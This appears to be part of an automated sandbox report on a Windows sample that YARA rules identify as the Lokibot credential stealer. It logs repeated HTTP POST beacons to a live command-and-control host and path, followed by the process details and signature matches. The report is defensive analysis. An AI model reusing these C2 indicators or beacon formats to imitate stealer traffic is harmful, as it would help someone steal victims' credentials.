                    Jan 14, 2022 09:24:27.434581995 CET1034OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:27.691371918 CET1034INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:26 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    40192.168.2.349848104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:47.885916948 CET10802OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:48.140469074 CET10803INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:47 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    41192.168.2.349849104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:50.027789116 CET10804OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:50.297445059 CET10804INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:49 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    42192.168.2.349851104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:53.334038973 CET10810OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:53.614516973 CET10811INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:52 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    43192.168.2.349852104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:55.488935947 CET10811OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:55.748456001 CET10812INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:54 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    44192.168.2.349853104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:58.848829031 CET10813OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:59.150161028 CET10813INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:58 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    45192.168.2.349854104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:26:01.825690031 CET10814OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:02.124898911 CET10815INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:01 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    46192.168.2.349855104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:26:03.549432993 CET10816OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:03.807121038 CET10816INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:02 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    47192.168.2.349856104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:26:05.020304918 CET10817OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:05.276611090 CET10818INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:04 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    48192.168.2.349857104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:26:06.500273943 CET10819OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:06.756701946 CET10819INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:05 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    49192.168.2.349858104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:26:07.901534081 CET10820OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:08.157304049 CET10821INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:07 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    5192.168.2.349748104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:29.242786884 CET1035OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:29.497827053 CET1036INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:28 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    50192.168.2.349859104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:26:09.260756969 CET10822OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:09.516175032 CET10822INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:08 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    51192.168.2.349860104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:26:10.842581034 CET10823OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:11.103255033 CET10824INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:10 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    52192.168.2.349861104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:26:12.247627974 CET10824OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:12.540654898 CET10825INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:11 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    53192.168.2.349862104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:26:13.817317009 CET10826OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:14.092477083 CET10826INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:13 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    54192.168.2.349863104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:26:15.234067917 CET10827OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:15.487595081 CET10828INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:14 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    55192.168.2.349864104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:26:16.746339083 CET10829OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:17.038023949 CET10829INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:15 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    6192.168.2.349749104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:31.358483076 CET1036OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:31.613352060 CET1037INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:30 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    7192.168.2.349750104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:32.843753099 CET1134OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:33.104927063 CET1135INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:32 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    8192.168.2.349751104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:34.253885984 CET1136OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:34.548223019 CET1136INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:33 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    9192.168.2.349752104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:35.721894026 CET1137OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:35.982877970 CET1137INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:34 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Code Manipulations

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    Analysis Process: __.exe PID: 7040 Parent PID: 3380

                    General

                    Start time:09:24:12
                    Start date:14/01/2022
                    Path:C:\Users\user\Desktop\__.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\__.exe"
                    Imagebase:0x400000
                    File size:238317 bytes
                    MD5 hash:E9B74BFB67BF3DCEF39E23674D4DD63F
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Analysis Process: __.exe PID: 5768 Parent PID: 7040

                    General

                    Start time:09:24:13
                    Start date:14/01/2022
                    Path:C:\Users\user\Desktop\__.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\__.exe"
                    Imagebase:0x400000
                    File size:238317 bytes
                    MD5 hash:E9B74BFB67BF3DCEF39E23674D4DD63F
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000003.00000002.553223743.00000000007A7000.00000004.00000020.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000003.00000003.316225767.00000000007BD000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Disassembly

                    Code Analysis

                    Reset < >